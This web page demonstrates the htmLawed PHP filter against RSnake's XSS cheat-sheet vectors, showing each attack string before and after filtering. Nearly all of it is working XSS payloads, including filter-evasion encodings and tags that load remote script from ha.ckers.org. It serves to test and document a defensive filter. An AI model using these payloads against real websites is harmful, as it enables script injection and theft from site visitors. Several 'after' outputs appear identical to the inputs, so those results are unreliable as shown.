htmLawed 1.0.7 'safe' mode against RSnake XSS vectors

PHP Labware internal utilities / htmLawed

HTMLAWED 1.0.7 safe mode against RSnake XSS VECTORS

To illustrate the anti-XSS'ing efficiency of htmLawed in 'safe' mode, htmLawed was used to filter text for each of the XSS vector (code) listed on RSnake's XSS cheat sheet (3 May 2008).

For each vector, the code is shown for both before and after the filtering. Vectors obviously designed to exploit HTML markup in the <head> section or in <frame>, <noframe>, or <frameset> elements of web-pages, or those targeting non-HTML content such as Flash movies, PHP interpreters, etc., were not considered as those are outside htmLawed's purview.

The 'safe' mode means that the $config parameter 'safe' is set to 1, and other parameters to over-ride any of the default parameter values implicitly used because of 'safe' are not specified.

In such cases, 'safe'=>1 is thus equivalent to the following in a $config value:

'comments'=>0,
'cdata'=>0, 'deny_attribute'=>'on*',
elements'=>'*-applet-embed-iframe-object-script',
'scheme'=>'href: aim, feed, file, ftp, gopher, http, https, irc,
mailto, news, nntp, sftp, ssh, telnet; style: nil; *:file, http, https'

Refer to htmLawed documentation for more about $config.

1. XSS Locator

About »
Input code »

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

2. XSS Quick Test

About »
Input code »

'';!--"<XSS>=&{()}

'';!--"<XSS>=&{()}

3. SCRIPT w/Alert()

About »
Input code »

<SCRIPT>alert('XSS')</SCRIPT>

<SCRIPT>alert('XSS')</SCRIPT>

4. SCRIPT w/Source File

About »
Input code »

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

5. SCRIPT w/Char Code

About »
Input code »

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

6. DIV background-image 1

About »
Input code »

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<div style="background-image: url(denied:javascript:alert('XSS'))"></div>

7. DIV background-image 2

About »
Input code »

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>

8. DIV expression

About »
Input code »

<DIV STYLE="width: expression(alert('XSS'));">

<div style="width;"></div>

9. IFRAME

About »
Input code »

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

10. INPUT Image

About »
Input code »

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<input type="image" src="denied:javascript:alert('XSS');" />

11. IMG w/JavaScript Directive

About »
Input code »

<IMG SRC="javascript:alert('XSS');">

<img src="denied:javascript:alert('XSS');" alt="image" />

12. IMG No Quotes/Semicolon

About »
Input code »

<IMG SRC=javascript:alert('XSS')>

<img src="denied:javascript:alert(" alt="image" />

13. IMG Dynsrc

About »
Input code »

<IMG DYNSRC="javascript:alert('XSS');">

<img src="src" alt="image" />

14. IMG Lowsrc

About »
Input code »

<IMG LOWSRC="javascript:alert('XSS');">

<img src="src" alt="image" />

15. IMG Embedded commands 1

About »
Input code »

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />

16. IMG Embedded commands 2

About »
Input code »

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

17. IMG STYLE w/expression

About »
Input code »

exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

18. List-style-image

About »
Input code »

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><ul><li>XSS</li></ul>

19. IMG w/VBscript

About »
Input code »

<IMG SRC='vbscript:msgbox("XSS")'>

<img src="denied:vbscript:msgbox("XSS")" alt="image" />

20. LAYER

About »
Input code »

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

21. Livescript

About »
Input code »

<IMG SRC="livescript:[code]">

<img src="denied:livescript:[code]" alt="image" />

22. Mocha

About »
Input code »

<IMG SRC="mocha:[code]">

<img src="denied:mocha:[code]" alt="image" />

23. OBJECT

About »
Input code »

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

24. OBJECT w/Embedded XSS

About »
Input code »

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>

25. Embed Flash

About »
Input code »

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

26. STYLE

About »
Input code »

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

27. STYLE w/Comment

About »
Input code »

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<img style="xss" src="src" alt="image" />

28. STYLE w/Anonymous HTML

About »
Input code »

<XSS STYLE="xss:expression(alert('XSS'))">

<XSS STYLE="xss:expression(alert('XSS'))">

29. TABLE

About »
Input code »

<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

<table></table>

30. TD

About »
Input code »

<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

<table><td></td></table>

31. XML namespace

About »
Input code »

<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>

<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>

32. XML data island w/CDATA

About »
Input code »

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><span></span>

33. XML data island w/comment

About »
Input code »

<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML>¬
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>¬
<span></span>

34. XML (locally hosted)

About »
Input code »

<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<span></span>

35. XML HTML+TIME

About »
Input code »

<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>

<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>

36. Commented-out Block

About »
Input code »

37. Local .htc file

About »
Input code »

<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">

<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">

38. Rename .js to .jpg

About »
Input code »

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

39. SSI

About »
Input code »

40. JavaScript Includes

About »
Input code »

<BR SIZE="&{alert('XSS')}">

<br />

41. Case Insensitive

About »
Input code »

<IMG SRC=JaVaScRiPt:alert('XSS')>

<img src="denied:JaVaScRiPt:alert(" alt="image" />

42. HTML Entities

About »
Input code »

<IMG SRC=javascript:alert("XSS")>

<img src="denied:javascript:alert("XSS")" alt="image" />

43. Grave Accents

About »
Input code »

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<img src="`javascript:alert(" alt="image" />

44. Image w/CharCode

About »
Input code »

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />

45. UTF-8 Unicode Encoding

About »
Input code »

<IMG SRC=javascript:alert('XSS')>

<img src="denied:javascript:alert('XSS')" alt="image" />

46. Long UTF-8 Unicode w/out Semicolons

About »
Input code »

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" alt="image" />

47. DIV w/Unicode

About »
Input code »

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<div style="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></div>

48. Hex Encoding w/out Semicolons

About »
Input code »

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" alt="image" />

49. End title tag

About »
Input code »

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

50. STYLE w/broken up JavaScript

About »
Input code »

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

51. Embedded Tab

About »
Input code »

<IMG SRC="jav ascript:alert('XSS');">

<img src="denied:jav ascript:alert('XSS');" alt="image" />

52. Embedded Encoded Tab

About »
Input code »

<IMG SRC="jav	ascript:alert('XSS');">

<img src="denied:jav	ascript:alert('XSS');" alt="image" />

53. Embedded Newline

About »
Input code »

<IMG SRC="jav
ascript:alert('XSS');">

<img src="denied:jav
ascript:alert('XSS');" alt="image" />

54. Embedded Carriage Return

About »
Input code »

<IMG SRC="javascript:alert('XSS');">

<img src="denied:javascript:alert('XSS');" alt="image" />

55. Multiline w/Carriage Returns

About »
Input code »

<IMG¬
SRC¬
=¬
"¬
j¬
a¬
v¬
a¬
s¬
c¬
r¬
i¬
p¬
t¬
:¬
a¬
l¬
e¬
r¬
t¬
(¬
'¬
X¬
S¬
S¬
'¬
)¬
"¬
>

<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />

56. Spaces/Meta Chars

About »
Input code »

<IMG SRC="  javascript:alert('XSS');">

<img src="denied:&#14; javascript:alert('XSS');" alt="image" />

57. Non-Alpha/Non-Digit

About »
Input code »

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

58. No Closing Script Tag

About »
Input code »

<SCRIPT SRC=http://ha.ckers.org/xss.js

<SCRIPT SRC=http://ha.ckers.org/xss.js

59. Protocol resolution in script tags

About »
Input code »

<SCRIPT SRC=//ha.ckers.org/.j>

<SCRIPT SRC=//ha.ckers.org/.j>

60. Half-Open HTML/JavaScript

About »
Input code »

<IMG SRC="javascript:alert('XSS')"

<IMG SRC="javascript:alert('XSS')"

61. Double open angle brackets

About »
Input code »

<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

62. Extraneous Open Brackets

About »
Input code »

<<SCRIPT>alert("XSS");//<</SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

63. Malformed IMG Tags

About »
Input code »

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">

64. No Quotes/Semicolons

About »
Input code »

<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>

<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>

65. Evade Regex Filter 1

About »
Input code »

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

66. Evade Regex Filter 2

About »
Input code »

<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

67. Evade Regex Filter 3

About »
Input code »

<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

68. Evade Regex Filter 4

About »
Input code »

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

69. Evade Regex Filter 5

About »
Input code »

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

70. Filter Evasion 1

About »
Input code »

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

71. Filter Evasion 2

About »
Input code »

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

72. Mixed Encoding

About »
Input code »

<A HREF="h¬
tt p://6	6.000146.0x7.147/">XSS</A>

<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>

73. JavaScript Link Location

About »
Input code »

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>

PHP Labware home | visitors since May 2006

PHP HTML filter PHP Anti-XSS Class - HTML purify PHP - XSS library - PHP HTML purification - HTM purify - PHP sanitize class - anti XSS input filter - HTML standards compliance - PHP balance tags - HTML tag balance - PHP filter script. PHP filter library. HTMLPurifier comparison HTML purifier. Filter tags attributes elements XHTML spec specs standards. White-list black list tags. W3C specs